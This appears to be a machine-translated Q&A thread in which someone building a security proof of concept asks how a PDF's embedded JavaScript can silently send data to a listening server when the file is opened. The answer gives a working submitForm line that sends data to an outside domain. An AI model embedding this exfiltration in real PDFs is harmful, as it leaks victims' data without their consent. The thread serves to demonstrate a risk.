我目前正在研究安全性概念证明,需要证明打开未知PDF文件的危险。
Internet表示,许多恶意软件使用PDF文档(AcroJS)中的Javascript下载其恶意负载。
我的PoC基于受害者,受害者将通过打开PDF文件来证明数据泄漏。我只需要通过Internet发送文件名。我可以编写在文档打开时启动的Javascript代码,但是Net.HTTP.request函数只能在受信任的上下文中使用。
因此,我看不到如何向收听的“邪恶”网站发出GET请求。
我读到有时黑客会利用Acrobat中的漏洞来做坏事,但是许多地方都在谈论AcroJS允许GET请求的本机功能。
有人知道如何执行单向GET请求(在这种情况下,服务器的响应甚至都不有趣)。
也许有一种方法可以包含远程(不存在)图片,因此PDF将对指定的URL发出GET请求。
或类似的东西。
感谢您的帮助,我知道这确实很接近安全性问题,但是我认为答案需要acroJS技能(在安全社区中很少见)。
谢谢
答案 0 :(得分:0)
好的,我找到了一种使用方法:
this.submitForm("http://mydomain.fr/var="+thedataIwant);
系统会提示用户有关HTTP连接的尝试,但这是我要测试的警惕性。
这个人的文章对我有很大帮助:https://acrobatusers.com/tutorials/author/parker